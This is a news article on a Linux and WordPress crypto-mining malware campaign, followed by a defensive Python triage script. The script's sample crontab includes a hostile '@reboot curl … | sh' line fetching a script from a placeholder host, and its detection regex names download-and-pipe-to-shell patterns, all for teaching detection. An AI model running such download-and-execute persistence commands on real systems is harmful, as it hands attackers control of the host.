New Malware Campaign Targets Linux and Web Apps to Install Crypto-Mining Software


Security researchers have identified a new campaign pushing malware that targets Linux devices and specific web applications with the purpose of deploying crypto-mining apps.

Taking over hardware to deploy crypto-mining apps is not uncommon. Criminals try to compromise systems so they can work from them to cut operational costs. Crypto mining is an expensive endeavor, and using other people’s systems reduces almost all costs.

Criminals tend to follow a similar path, and it starts by identifying poorly protected devices and services, usually with default or weak credentials. Bitdefender identified a similar campaign a few months ago, with attackers deploying Monero mining malware via weak SSH credentials.

The campaign Akamai security researchers discovered is more complex, as criminals tried a lot harder to obfuscate their activity on compromised systems. Like Bitdefender, Akamai used specially designed honeypots to track the malware’s behavior once it entered the system.

The attackers deployed PHP malware, which the researchers named Capoae. The systems are likely compromised via an infected WordPress plugin named ‘download-monitor’.

“Download-monitor had been installed after the honeypot’s weak WordPress admin credentials had been guessed,” said the Akamai researchers. “A 3MB UPX packed Golang binary was also downloaded to /tmp. Upon examination, it was clear the malware had some decryption functionality and an encrypted file stored in another directory.”

The goal is to deploy a Golang binary that eventually uses a number of known Oracle WebLogic vulnerabilities to infect systems with weak credentials and deploy XMRig, a crypto-mining software. Of course, it also employs numerous obfuscation tactics in an attempt to stay under the radar.

“Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts (files, crontab entries, SSH keys, etc.), and suspicious access log entries, etc., will help you potentially identify compromised machines,” the researchers also said. A full list of indicators of compromise is also available.
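As an added example, not code from the Bitdefender article or from Akamai's research, the following Python script turns the indicator classes listed above into concrete host checks for a Linux web server: repeated login attempts in the WordPress access log (the weak-credential guessing the honeypot saw), a plugin install from the admin panel, crontab entries that run from /tmp or pipe a download into a shell, and processes that burn CPU or execute from /tmp. All log lines, crontab text and process listings below are constructed sample data; the `wp-login.php` and `wp-admin/update.php?action=upload-plugin` paths are standard WordPress endpoints, and the thresholds are my own assumptions, not values from the campaign.

```python
"""Triage checks for a Linux web host, mapped to the indicator classes in the
article: access-log anomalies, cron persistence, and unexpected processes.
All sample data in this file is constructed for the example."""
import re
from collections import Counter

# Apache/nginx "combined" format: ip - - [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Cron lines that run from world-writable dirs, pipe a download into a shell,
# or decode base64 inline (assumed heuristics, not the campaign's IoCs).
CRON_SUSPECT = re.compile(
    r'(/tmp/|/dev/shm/|\b(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode))'
)


def find_login_bruteforce(log_lines, threshold=5):
    """Return {ip: count} for sources that POSTed to wp-login.php at least
    `threshold` times; that is the footprint of admin-password guessing."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("method") == "POST" and m.group("path").startswith("/wp-login.php"):
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def find_plugin_uploads(log_lines):
    """Return (ip, path) for successful POSTs to the plugin-upload endpoint;
    a plugin install nobody on the team made deserves a look."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if (m and m.group("method") == "POST"
                and "/wp-admin/update.php?action=upload-plugin" in m.group("path")
                and m.group("status")[0] in "23"):
            hits.append((m.group("ip"), m.group("path")))
    return hits


def find_suspicious_cron(crontab_text):
    """Return non-comment crontab lines matching CRON_SUSPECT."""
    out = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and CRON_SUSPECT.search(s):
            out.append(s)
    return out


def find_suspicious_processes(ps_lines, cpu_threshold=80.0):
    """Parse `ps -eo pid,pcpu,args --no-headers` output and return
    (pid, cpu, args) for processes above the CPU threshold or running
    out of /tmp or /dev/shm (where the article's dropper was written)."""
    flagged = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, cpu, args = parts
        try:
            cpu = float(cpu)
        except ValueError:
            continue
        exe = args.split()[0]
        if cpu >= cpu_threshold or exe.startswith(("/tmp/", "/dev/shm/")):
            flagged.append((int(pid), cpu, args))
    return flagged


# ---- constructed sample inputs (TEST-NET addresses, invented paths) ----
SAMPLE_ACCESS_LOG = (
    [f'203.0.113.7 - - [10/Sep/2021:10:01:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"'
     for s in range(6)]
    + ['198.51.100.2 - - [10/Sep/2021:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
       '198.51.100.2 - - [10/Sep/2021:10:02:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
       '203.0.113.7 - - [10/Sep/2021:10:03:10 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 302 0 "-" "Mozilla/5.0"']
)
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.x/run.sh >/dev/null 2>&1
@reboot curl -s http://198.51.100.9/i.sh | sh
"""
SAMPLE_PS = [
    "  812  0.3 /usr/sbin/sshd -D",
    " 1044  1.2 php-fpm: pool www",
    " 2301 97.5 /tmp/.x/run",
    " 2400  0.0 /bin/sleep 60",
]


def triage(log_lines=SAMPLE_ACCESS_LOG, crontab_text=SAMPLE_CRONTAB, ps_lines=SAMPLE_PS):
    """Run every check and return one dict for reporting or alerting."""
    return {
        "login_bruteforce": find_login_bruteforce(log_lines),
        "plugin_uploads": find_plugin_uploads(log_lines),
        "cron": find_suspicious_cron(crontab_text),
        "processes": find_suspicious_processes(ps_lines),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(f"{name}: {result}")
```

On a live host, feed `triage()` the real access log, the output of `crontab -l` for each user plus the files under `/etc/cron.d`, and `ps -eo pid,pcpu,args --no-headers`; the thresholds are starting points to tune against the server's normal baseline, and a hit from any one check is a prompt to examine the host, not proof of compromise on its own.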